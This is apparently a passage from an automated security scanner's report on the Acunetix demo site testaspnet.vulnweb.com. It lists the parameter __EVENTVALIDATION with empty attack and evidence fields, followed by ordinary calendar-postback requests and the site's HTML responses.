daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8377&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAABQJq%2FY2ghkZGRbVzgjENz9lvG04FiZbdtey9VJdw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKU%2BKTPCQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAz17iu9Vik5ObknVjju95m%2BxWz%2B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:08 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAABQJq/Y2ghkZGRbVzgjENz9lvG04FiZbdtey9VJdw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKU+KTPCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAz17iu9Vik5ObknVjju95m+xWz+" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:White" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8558&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAFCPqZtsIZGRkF4QWtnSsQXWuZa9AnjsnPeDe%2FpU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKU%2F5nYDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMm35%2FbsiiMpdJ5k60SYhesgUnHAc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:36 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAFCPqZtsIZGRkF4QWtnSsQXWuZa9AnjsnPeDe/pU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKU/5nYDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMm35/bsiiMpdJ5k60SYhesgUnHAc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:White" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
